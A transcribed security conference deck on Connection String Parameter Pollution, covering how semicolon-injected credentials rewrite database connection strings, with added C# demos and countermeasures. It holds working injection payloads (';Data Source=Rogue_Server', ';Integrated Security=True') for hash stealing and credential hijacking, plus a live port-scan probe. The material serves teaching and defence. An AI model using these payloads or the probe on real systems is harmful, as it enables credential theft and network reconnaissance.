Chema Alonso, Informática 64: Connection Strings (PowerPoint PPT presentation)


  1. Chema Alonso, Informática 64

  2. Connection Strings
     • Define the way an application connects to a data repository
     • There are connection strings for:
       – Relational databases (MSSQL, Oracle, MySQL, …)
       – LDAP directories
       – Files
       – Etc.

  3. Database Connection Strings
     Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword;

  4. Google Hacking

  5. Google Hacking

  6. UDL (Universal Data Link) Files

  7. Credentials
     • Database credentials (a login managed by the database engine):
       Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = No;
     • Operating system accounts (the Windows account of the process opens the connection; User Id/Password are then ignored):
       Data Source = myServerAddress; Initial Catalog = myDataBase; Integrated Security = SSPI/True/Yes;

  8. Users authenticated by the Web App
     The web application manages the login process:
     1. The web application connects to the database using the credentials in its own connection string.
     2. It asks the user for login information.
     3. It checks that information against data stored in a custom users table (e.g. "Select id from users ...").
     (Diagram: app running on the web server; connection string; database engine with syslogins and the custom users table)

  9. Users authenticated by the Database
     The database engine manages the login process:
     1. The web application asks the user for credentials.
     2. A connection string is composed with those credentials to connect to the database.
     3. Roles and permissions are limited to those of the user in the connection string.
     (Diagram: app running on the web server; connection string; database engine with syslogins)

  10. Connection String Attacks
     • It is possible to inject parameters into connection strings, using semicolons as separators:
       Data Source = myServerAddress; Initial Catalog = myDataBase; Integrated Security = NO; User Id = myUsername; Password = myPassword; Encryption = Off;

  11. ConnectionStringBuilder
     • Available since .NET Framework 2.0
     • Builds connection strings safely from individual parameters (a value containing a separator is quoted)
     • Parameters cannot be injected into the connection string through a value

  12. Are people aware of this?

  13. Connection String Parameter Pollution
     • The goal is to inject parameters into the connection string, whether they already exist in it or not
     • If a parameter is duplicated, the last value wins
     • This behaviour allows an attacker to rewrite the connection string completely, and therefore to manipulate how the application works and how it authenticates

  14. Pollutable Behaviour
     Param1=Value A; Param2=Value B; Param1=Value C; Param2=Value D
     -> DBConnection object: Param1 = Value C, Param2 = Value D
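The following C# program is an added example; it is not code from the deck or from Informática 64. It builds a connection string the way a vulnerable page does (credentials concatenated between the separators, the pattern behind slides 10 and 13), feeds it a user name and password that carry extra parameters, and re-parses the result with SqlConnectionStringBuilder so the last-value-wins behaviour of slides 13 and 14 is visible; it then builds the same string with SqlConnectionStringBuilder (slide 11) to show that the payload is quoted and stays a literal value. It assumes the classic System.Data.SqlClient provider; SQL2005, db1 and Rogue_Server are the deck's placeholder names.

```csharp
// Added example: not code from the deck. Models the vulnerable template the
// slides use (credentials concatenated into the string) against the
// SqlConnectionStringBuilder fix, and re-parses both so last-value-wins is
// visible. Assumes System.Data.SqlClient; SQL2005, db1 and Rogue_Server are
// the deck's placeholder names.
using System;
using System.Data.SqlClient;

static class CsppDemo
{
    // Vulnerable pattern: whatever the user typed lands between the
    // separators, so a ';' in the input starts a new parameter.
    public static string BuildVulnerable(string user, string password)
    {
        return "Data source = SQL2005; initial catalog = db1; Integrated Security=no;"
             + " user id=" + user + "; Password=" + password + ";";
    }

    // Hardened pattern: the builder quotes any value that contains ';',
    // so the input stays inside the User ID / Password value.
    public static string BuildHardened(string user, string password)
    {
        var b = new SqlConnectionStringBuilder
        {
            DataSource = "SQL2005",
            InitialCatalog = "db1",
            IntegratedSecurity = false,
            UserID = user,
            Password = password
        };
        return b.ConnectionString;
    }

    // Parse a finished string the way SqlConnection will: duplicate keys are
    // accepted and the last occurrence wins.
    public static void Report(string label, string cs)
    {
        var parsed = new SqlConnectionStringBuilder(cs);
        Console.WriteLine(label);
        Console.WriteLine("  string     : " + cs);
        Console.WriteLine("  DataSource : " + parsed.DataSource);
        Console.WriteLine("  UserID     : " + parsed.UserID);
        Console.WriteLine("  Integrated : " + parsed.IntegratedSecurity);
    }

    static void Main()
    {
        // Attack-1 payloads: the "user name" closes user id and adds a second
        // Data Source; the "password" adds a second Integrated Security.
        string userPayload = ";Data Source=Rogue_Server";
        string passPayload = ";Integrated Security=True";

        Report("vulnerable", BuildVulnerable(userPayload, passPayload));
        // DataSource = Rogue_Server, Integrated = True: the application
        // pool's Windows credentials are sent to the attacker's host.

        Report("hardened", BuildHardened(userPayload, passPayload));
        // DataSource = SQL2005, Integrated = False: the payload is just a
        // literal (and useless) user name.
    }
}
```

The hardened string comes out as `User ID=";Data Source=Rogue_Server";Password=";Integrated Security=True"`, and SqlConnection honours the quotes when it parses it, so the duplicated keys never exist. Rejecting ';' and '=' in credentials before they reach the builder is still a worthwhile second layer, since it also blocks the payload from reaching any other component that concatenates.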

  15. What can be done with CSPP? Rewrite a parameter
     Data Source=DB1; UID=sa; password=Pwnd!; Data Source=DB2
     -> DBConnection object: DataSource = DB2, UID = sa, password = Pwnd!

  16. Scanning the DMZ
     (Diagram: Internet -> FW -> web app vulnerable to CSPP -> Data Source -> Production Database; also reachable from the web app: Financial Database, Test Database, Forgotten Development Database)

  17. Port Scanning a Server
     (Diagram: Internet -> FW -> web app vulnerable to CSPP; Data Source = DB1,80 / DB1,21 / DB1,25 / DB1,1445 -> Production Database / Server)

  18. What can be done with CSPP? Add a parameter
     Data Source=DB1; UID=sa; password=Pwnd!; Integrated Security=True
     -> DBConnection object: DataSource = DB1, UID = sa, password = Pwnd!, Integrated Security = True

  19. CSPP Attack 1: Hash stealing
     1. Run a rogue server on an accessible IP address: Rogue_Server
     2. Activate a sniffer to catch the login process: Cain/Wireshark
     3. Duplicate the Data Source parameter: Data_Source=Rogue_Server
     4. Force Windows Integrated Authentication: Integrated Security=true

  20. CSPP Attack 1: Hash stealing
     Template: Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id='+User_Value+'; Password='+Password_Value+';
     Result:   Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Rogue_Server; Password=;Integrated Security=True;

  21. CSPP 1: ASP.NET Enterprise Manager

  22. CSPP Attack 2: Port Scanning
     1. Duplicate the Data Source parameter, setting in it the target server and the target port to be scanned: Data_Source=Target_Server,target_Port
     2. Check the error messages:
        - No TCP connection -> port is closed
        - TCP connection but no SQL Server -> port is open
        - SQL Server -> invalid password

  23. CSPP Attack 2: Port Scanning
     Template: Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id='+User_Value+'; Password='+Password_Value+';
     Result:   Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Target_Server,Target_Port; Password=;Integrated Security=True;
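An added example of the "check the error messages" step of attack 2, written in C# against System.Data.SqlClient; it is not code from the deck. `DataSourceFor` produces the `host,port` form SqlClient uses to reach a non-default port, `Classify` maps the SqlException text to the three outcomes on slide 22, and `Probe` runs a real connection attempt with a polluted string and classifies the failure. The message fragments are the ones SqlClient typically emits on Windows; treat that mapping as an assumption to confirm against your provider version. Target_Server and port 1445 are placeholders, and the messages in Main are constructed, abridged samples so the classifier runs offline.

```csharp
// Added example: not code from the deck. Implements the error-message check
// of CSPP attack 2 against System.Data.SqlClient. The message fragments are
// an assumption (typical SqlClient text on Windows); Target_Server and 1445
// are placeholders.
using System;
using System.Data.SqlClient;

static class CsppPortScan
{
    public enum PortState { Closed, OpenNotSqlServer, SqlServer, Unknown }

    // SqlClient's "host,port" syntax is what lets a polluted Data Source
    // reach an arbitrary TCP port on the target.
    public static string DataSourceFor(string host, int port)
    {
        return host + "," + port;
    }

    // Map the error text back to the states listed on the slide.
    public static PortState Classify(string message)
    {
        if (message.Contains("actively refused"))
            return PortState.Closed;            // TCP connect failed
        if (message.Contains("pre-login handshake"))
            return PortState.OpenNotSqlServer;  // TCP ok, peer is not TDS
        if (message.Contains("Login failed for user"))
            return PortState.SqlServer;         // TDS answered, login rejected
        return PortState.Unknown;
    }

    // Live probe: open the polluted string and classify whatever fails.
    public static PortState Probe(string polluted)
    {
        try
        {
            using (var conn = new SqlConnection(polluted))
            {
                conn.Open();
                return PortState.SqlServer;     // login actually succeeded
            }
        }
        catch (SqlException ex)
        {
            return Classify(ex.Message);
        }
    }

    static void Main()
    {
        // Constructed, abridged samples of what SqlClient returns.
        string[] samples =
        {
            "A network-related or instance-specific error occurred ... (provider: TCP Provider, error: 0 - No connection could be made because the target machine actively refused it.)",
            "A connection was successfully established with the server, but then an error occurred during the pre-login handshake. ...",
            "Login failed for user ''."
        };
        foreach (var m in samples)
            Console.WriteLine(Classify(m) + " <- " + m);

        // What the polluted Data Source value looks like for one port.
        string ds = DataSourceFor("Target_Server", 1445);
        Console.WriteLine("polluted Data Source: " + ds);

        // Live use (needs network access):
        // Probe("Data source=SQL2005;initial catalog=db1;Integrated Security=no;"
        //     + "user id=;Data Source=" + ds + ";Password=;Integrated Security=True;");
    }
}
```

When many ports are probed through the vulnerable page, add a short `Connect Timeout` to the string: an open port that is not SQL Server may hold the TDS pre-login until the default 15-second timeout expires, which is also the behaviour a defender can alert on (bursts of failed logins whose Data Source differs from the configured one).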

  24. CSPP 2: myLittleAdmin: port is open

  25. CSPP 2: myLittleAdmin: port is closed

  26. CSPP Attack 3: Hijacking Web Credentials
     1. Duplicate the Data Source parameter, pointing it at the target SQL Server: Data_Source=Target_Server
     2. Force Windows Authentication: Integrated Security=true
     3. The application pool the web app runs in will send its own credentials in order to log in to the database engine.

  27. CSPP Attack 3: Hijacking Web Credentials
     Template: Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id='+User_Value+'; Password='+Password_Value+';
     Result:   Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Target_Server; Password=;Integrated Security=true;

  28. CSPP Attack 3: Web Data Administrator

  29. CSPP Attack 3: myLittleAdmin/myLittleBackup

  30. CSPP Attack 3: ASP.NET Enterprise Manager

  31. Other Databases
     • MySQL
       – Does not support integrated security
       – It is still possible to manipulate the behaviour of the web application:
         • Port scanning
         • Connecting to internal/testing/development databases
     • Oracle supports integrated authentication on Windows and UNIX/Linux servers
       – All of the described attacks are possible:
         • Hash stealing
         • Port scanning
         • Hijacking web credentials
       – It is also possible to elevate a connection to sysdba in order to shut down/start up an instance

  32. myLittleAdmin/myLittleBackup
     myLittleTools released a security advisory and a patch about this

  33. ASP.NET Enterprise Manager
     • ASP.NET Enterprise Manager is "abandoned", but it is used in a lot of web control panels.
     • Fix the code yourself


  35. ASP.NET Web Data Administrator
     ASP.NET Web Data Administrator is secure on the CodePlex web site, but not on the Microsoft web site, where an insecure old version is published.

  36. Countermeasures
     • Harden your firewall
       – Outbound connections
     • Harden your internal accounts
       – Web application
       – Web server
       – Database engine
     • Use ConnectionStringBuilder
     • Filter the ;)

  37. Questions?
     Contact: Chema Alonso, chema@informatica64.com, http://www.informatica64.com, http://elladodelmal.blogspot.com; Palako, palakko@lateatral.com
     Authors: Chema Alonso, Manuel Fernández "The Sur", Alejandro Martín Bailón, Antonio Guzmán
